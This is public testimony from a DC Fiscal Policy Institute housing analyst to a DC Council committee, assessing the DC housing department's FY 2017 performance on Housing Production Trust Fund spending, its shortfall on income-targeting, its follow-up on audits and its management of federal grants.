Chairperson Bonds and members of the Committee, thank you for the opportunity to speak today. My name is Claire Zippel and I am the housing policy analyst and research coordinator at the DC Fiscal Policy Institute. DCFPI is a non-profit organization that promotes opportunity and widespread prosperity for all residents of the District of Columbia through independent research and thoughtful policy solutions.
In fiscal year (FY) 2017, the Department of Housing and Community Development (DHCD) made progress on a number of fronts, including reducing the Housing Production Trust Fund (HPTF) fund balance and improving its management of federal funds. Yet the longstanding issue of incompliance with the statutory requirement that 40 percent of HPTF resources support housing for extremely low-income residents remains unsolved.
DHCD Is Putting Housing Production Trust Fund Dollars to Work
In FY 2017, for the first time in recent history, the fund balance of the Housing Production Trust Fund (HPTF) declined—a sign that DHCD’s efforts to put new housing investments to work faster are making a difference. According to the city’s Comprehensive Annual Financial Report (CAFR), both HPTF spending (distribution of funds according to loan agreements) and obligations (signing of new loan agreements with affordable housing projects) continue to track upward (Figure 1). This progress was made possible by several of DHCD’s recent initiatives, including more frequent rounds of funding competitions, the creation of an online application portal, speedier underwriting timelines, and awarding funds to tenants purchasing their buildings through the Tenant Opportunity to Purchase Act on a rolling basis throughout the year.
- In FY 2017, DHCD obligated $140 million in new HPTF loans—a 25 percent increase from the previous fiscal year and nearly quadruple that of FY 2013.
- The District also spent $124 million of HPTF funds in FY 2017, reaching one of the highest levels of fiscal year spending in the HPTF’s history, second only to 2008.[i]
- Moreover, essentially all the remaining HPTF fund balance is on the path to creating or preserving affordable housing. The DHCD project pipeline includes $220 million in active requests,[ii] which are funds for projects that have been awarded HPTF funds but whose loans are in underwriting but have not yet closed. In the CAFR, those funds appear to be in the unobligated fund balance; however, those funds will be needed by the project down the line when its loan closes and are not available to be awarded to another project.
Continuing Lack of Compliance with HPTF Income-Targeting Requirements
As important as putting HPTF dollars to work quickly is ensuring that those resources are deployed in a way that addresses DC’s most urgent housing needs and is aligned with DC law. Three-fourths of DC households who face severe housing cost burden are extremely low-income, a group which includes one in five children in the District.[iii] By law, 40 percent of HPTF resources obligated each fiscal year must support housing affordable to extremely low-income residents (those below 30 percent of area median income, or AMI). Unfortunately, FY 2017 marks another year that HPTF obligations failed to meet this statutory requirement. Moreover, DHCD projects that the HPTF will also fall short in FY 2018 and FY 2019. This means that since FY 2014, only once has the District dedicated 40 percent of HPTF resources to extremely low-income households as required by law (Figure 2).[iv]
DHCD has identified several reasons why it has not met with this requirement in the past and has provided some indications that it hopes to improve compliance with the law going forward. Yet it is still unclear whether DHCD has a specific plan to improve its performance.
The agency indicates that its efforts to preserve existing affordable housing makes it difficult to also dedicate a large share of funding to extremely low-income households.[v] Affordable housing preservation is an important purpose, and it is true that many affordable buildings that apply for HPTF funds are above the 30 percent AMI level. (DHCD indicates that the new public-private preservation fund will become the funding mechanism of choice for some of such projects, which should free up some HPTF funds for other uses.)
However, this points to the need for DHCD to proactively identify deeply affordable housing for preservation, in order to both save the homes of the city’s lowest-income residents and facilitate compliance with the HPTF law. Surely there are existing properties in the District that are occupied by extremely low-income households and require rehabilitation and preservation, such as those with Section 8 subsidies. We recommend that DHCD’s preservation unit and new preservation officer keep the HPTF statute in mind as they develop the agency’s proactive preservation strategy.
While diverting some preservation projects from the HPTF to the new preservation fund may improve compliance with the HPTF statute, funding selection criteria that more strongly prioritize extremely low-income housing are likely necessary as well. “Legacy” projects (those selected by prior administrations) are one reason why greater compliance with the law was not evident in FY 2017 despite recent funding rounds’ emphasis on lower income targeting. Yet DHCD projects that the HPTF will also fail to meet statutory requirements in FY 2018 and FY 2019, [vi] when nearly all obligations will be to projects selected under the current criteria. This suggests that future funding rounds must more stringently prioritize extremely low-income housing.
Finally, we recognize that one key driver of the lack of HPTF targeting compliance is not strictly under DHCD’s control. In recent years, the city has not provided enough new operating subsidies for affordable buildings through the Local Rent Supplement Program (LRSP). Ongoing LRSP assistance is typically required for HPTF-assisted housing to be made affordable to extremely low-income residents. While LRSP is budgeted within the DC Housing Authority subsidy, the link between the availability of LRSP and DHCD’s ability to meet its statutory obligations suggests that DHCD should have a more proactive role in identifying an adequate level of LRSP funding and requesting that funding from the Mayor and Council.
Implementation of HPTF Audit Recommendations
A series of recent reports by the Office of the DC Auditor found several lapses in DHCD’s oversight of 14 affordable housing projects that received loans from the Housing Production Trust Fund, as well as shortcomings in DHCD’s financial reporting on the HPTF.[vii] Inadequate staffing was a key reason projects slipped through the cracks, according to the audit. In the FY 2018 budget, the Mayor and Council provided funding to beef up staffing in DHCD’s asset management division. As of this month, candidates for all the new positions have been selected, including two deputy division directors who will be responsible for putting in place more stringent standard operating procedures to enhance project oversight and compliance going forward.[viii] These hires are a promising first step. We encourage DHCD to move quickly to implement all of the DC Auditor’s recommendations.
Management of Federal Funds Is Improving
DHCD has undertaken a significant effort to improve the management of grants it receives from the federal Department of Housing and Urban Development (HUD), including the HOME and Community Development Block Grant (CDBG). Each year, HUD audits its grantees. In FY 2014, there were 17 findings on DC’s audit; in FY 2016, there were two findings.[ix] This reflects the fact that DHCD has strengthened its underwriting process and aligned its personnel services budget with each grant’s administrative spending cap. The latter was a substantial undertaking which required a detailed review of the agency’s entire personnel services budget and the reallocation of staff time among various funding sources.
Additionally, DHCD has made some progress to improve the agency’s troubled track record of spending down the federal grants it receives. DHCD successfully completed a remedial CDBG spending plan for HUD, and as a result, the agency met its CDBG spending test (a HUD assessment of whether a grantee is obligating its funds in a timely manner) in FY 2017 for the first time in several years.[x] However, there is additional work to be done to maximize the use of federal funds, particularly the HOME grant. DHCD should continue its efforts to put federal dollars to work more quickly.
Thank you again for the opportunity to testify today. I would be happy to answer any questions.
[i] FY 2001-2017 Comprehensive Annual Financial Reports.
[ii] DHCD pre-hearing responses, pg. 59.
[iii] DCFPI, “Broken Foundation: Affordable Housing Crisis Threatens DC’s Lowest Income Residents,” 2016.
[iv] DHCD pre-hearing responses, pg. 66.
[v] DHCD pre-hearing responses, pg. 66.
[vi] DHCD pre-hearing responses, pg. 66.
[vii] ODCA Reports DCA232016 and DCA112017.
[viii] Information provided to the author by DHCD.
[ix] Information provided to the author by DHCD.
[x] DHCD pre-hearing responses, OCA performance plan attachment. | https://www.dcfpi.org/all/testimony-of-claire-zippel-at-the-performance-oversight-hearing-on-the-department-of-housing-and-community-development/ |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.